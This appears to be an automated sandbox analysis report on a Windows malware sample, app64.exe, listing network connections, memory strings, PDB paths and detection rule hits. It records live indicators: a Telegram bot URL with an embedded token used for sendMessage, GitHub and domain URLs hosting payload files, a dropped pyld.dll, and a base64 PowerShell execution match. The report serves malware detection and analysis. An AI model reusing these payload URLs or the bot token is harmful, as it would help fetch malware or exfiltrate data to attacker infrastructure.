Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: app64.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.13.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000001C.00000002.3269556745.00007FF8A7DCB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.13.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C568 FindClose,FindFirstFileExW,GetLastError, 34_2_00007FF74713C568
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF74713C5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 34_2_00007FF74713C5DC
Source: C:\Users\user\Desktop\app64.exe Code function: 4x nop then push rbx 0_2_00007FF7DF1146C6

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.5:49946 -> 188.116.21.204:5432
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A9311C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark, 28_2_00007FF8A9311C20
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global traffic HTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: rootunvbot.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: unvdwl.com
Source: global traffic DNS traffic detected: DNS query: dns.google
Source: global traffic DNS traffic detected: DNS query: rootunvdwl.com
Source: unknown HTTP traffic detected: POST /bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 30 Oct 2024 10:29:54 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgrade
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 96CF:2880F0:110F41E:128DF92:67220ADDAccept-Ranges: bytesDate: Wed, 30 Oct 2024 10:30:57 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdal2120109-DFWX-Cache: MISSX-Cache-Hits: 0X-Timer: S1730284257.426488,VS0,VE85Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 5f8a816a393c558f9f4badd0a02981015de93158Expires: Wed, 30 Oct 2024 10:35:57 GMTSource-Age: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:30:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.26.192.52/un2/urestorehard.dat
Source: powershell.exe, 00000028.00000002.2570675567.0000018003DB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000028.00000002.2570252643.0000018001535000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftk
Source: powershell.exe, 00000003.00000002.2218673511.000002712643C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: svchost.exe, 0000001C.00000002.3267456047.0000000064953000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2218673511.0000027126477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unvdwl.com/un2/botprnt.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://unvdwl.com/un2/urestorehard.dat
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: http://www.zlib.net/
Source: svchost.exe, 0000001C.00000002.3270431776.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597133834.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623418463.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003377000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000028.00000002.2570675567.0000018003E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.tele
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegra
Source: powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.o
Source: powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.or
Source: powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000028.00000002.2620974839.000001801B64F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/b
Source: powershell.exe, 00000028.00000002.2570675567.00000180037FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985
Source: printui.exe, 0000000D.00000002.2687540971.0000020E692D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessJO
Source: powershell.exe, 00000028.00000002.2570454684.0000018002E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage
Source: powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage.dll
Source: powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessagea$
Source: powershell.exe, 00000028.00000002.2620911550.000001801B540000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage
Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/
Source: svchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/V
Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: svchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: svchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: x590769.dat.13.dr String found in binary or memory: https://dns.google/resolve?name=
Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027126437000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmai
Source: powershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat
Source: svchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.dat
Source: svchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.dat
Source: svchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.dat
Source: svchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.dat
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datf
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datpt:
Source: powershell.exe, 00000003.00000002.2218673511.000002712595C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.dr String found in binary or memory: https://ipinfo.io/json
Source: svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.dr String found in binary or memory: https://ipinfo.io/jsonhardware_manager::download_json_error:
Source: powershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/
Source: svchost.exe, 0000001C.00000002.3269141211.000001D8E78F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.dat
Source: powershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
Source: svchost.exe, 0000001C.00000002.3267873513.00000000660F4000.00000008.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: svchost.exe, 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000001C.00000002.3269701868.00007FF8A7ECE000.00000002.00000001.01000000.00000010.sdmp, libssl-3-x64.dll.13.dr String found in binary or memory: https://www.openssl.org/H
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 28_2_00007FF8B8372B80
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B8372B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 34_2_00007FF8B8372B80

System Summary

Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6620, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E38 NtClose, 0_2_00007FF7DF113E38
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E44 NtCreateUserProcess, 0_2_00007FF7DF113E44
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF113E5C NtDelayExecution, 0_2_00007FF7DF113E5C
